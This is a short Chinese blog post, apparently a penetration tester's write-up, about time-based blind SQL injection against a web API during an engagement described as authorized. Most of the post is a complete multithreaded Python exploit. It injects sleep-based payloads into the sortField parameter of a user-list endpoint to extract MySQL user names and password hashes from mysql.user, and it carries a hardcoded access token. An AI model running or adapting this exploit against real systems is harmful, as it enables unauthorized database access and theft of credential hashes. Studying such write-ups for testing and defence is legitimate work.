记一次Sql盲注
在22年2月份的时候 leader给了个任务 让测个站,因为站点是搭在贵阳那边,还要挂VPN
那没办法 只能硬着头皮上了
上去就先扫了一通目录
但是没啥收获,xray被动扫描 看看
我又觉得我可以了
然后问了一下客户,客户说可以爆数据,但是只能爆一点点
行吧 写了脚本跑一下盲注
EXP
import threading
import requests
from time import time, sleep
# import threadpool
# import multiprocessing as mp
import queue
import logging
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(filename)s %(levelname)s %(message)s",
datefmt="%a %d %b %Y %H:%M:%S")
headers = {
'Token': '5e4b0719a1884425a8477719e6e7e42f'
}
s = requests.session()
url = "http://172.16.65.99/api/system/user/list"
proxies = {"http": "http://127.0.0.1:8080"}
proxies = None
lock = threading.RLock()
data = None
dbnames = {}
class myThread(threading.Thread):
def __init__(self, queue):
super(myThread, self).__init__()
self.__queue = queue
def run(self):
while True:
q_method, args1 = self.__queue.get()
global data, dbnames
# lock.acquire()
data, numbers = q_method(args1)
# lock.release()
if data:
dbnames[numbers] = data
self.__queue.task_done() # 用来标志任务结束
# f"(select*from(select+if(length((select group_concat(schema_name) from information_schema.schemata))='{str(length)}',sleep(2),1)union/**/select+1)a)",
# select length((select concat(user, ',',authentication_string) from mysql.user limit 0, 1));
def getAllLength():
length = 40
while True:
length += 1
json = {
"pageNum": 1,
"pageSize": 10,
"sortField": f"(select*from(select+if(length((select concat(user, ',',authentication_string) from mysql.user limit 0, 1))='{str(length)}',sleep(2),1)union/**/select+1)a)",
"sortOrder": "desc"
}
lock.acquire()
start = time()
_ = s.post('http://172.16.65.99/api/system/user/list', headers=headers, json=json, proxies=proxies)
logging.info("猜解当前数据长度为:" + str(length))
if time() - start > 2:
logging.info("长度为" + str(length))
return length
# '''select if(ascii(substr((select concat(user, ',',authentication_string) from mysql.user limit 0, 1),1,1))=114,sleep(3),1);'''
# f"(select*from(select+if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{str(numbers)},1))={asciis},sleep(3),1)union/**/select+1)a)",
def getAllName(numbers, asciis=0):
for asciis in range(21, 127):
json = {
"pageNum": 1,
"pageSize": 10,
"sortField": f"(select*from(select+if(ascii(substr((select concat(user, ',',authentication_string) from mysql.user limit 0, 1),{str(numbers)},1))={asciis},sleep(3),1)union/**/select+1)a)",
"sortOrder": "desc"
}
start = time()
_ = s.post('http://172.16.65.99/api/system/user/list', headers=headers, json=json, proxies=proxies)
add_time = time() - start
# print(add_time)
if add_time > 3:
logging.info("第" + str(numbers) + "个字符为:" + chr(asciis))
return chr(asciis), numbers
def display_word(dict1):
words = ""
for i in sorted(dict1):
words += dict1[i]
return words
if __name__ == '__main__':
queue = queue.Queue(6)
for i in range(queue.maxsize):
t = myThread(queue)
t.setDaemon(True)
t.start()
time_now = time()
for numbers in range(1, getAllLength()+1):
logging.info(f"猜解第{str(numbers)}个字符")
if data:
data = None
queue.put((getAllName, numbers))
queue.join()
logging.info(display_word(dbnames))
print("花费:" + str(time() - time_now))这是一部分猜解
Comments | NOTHING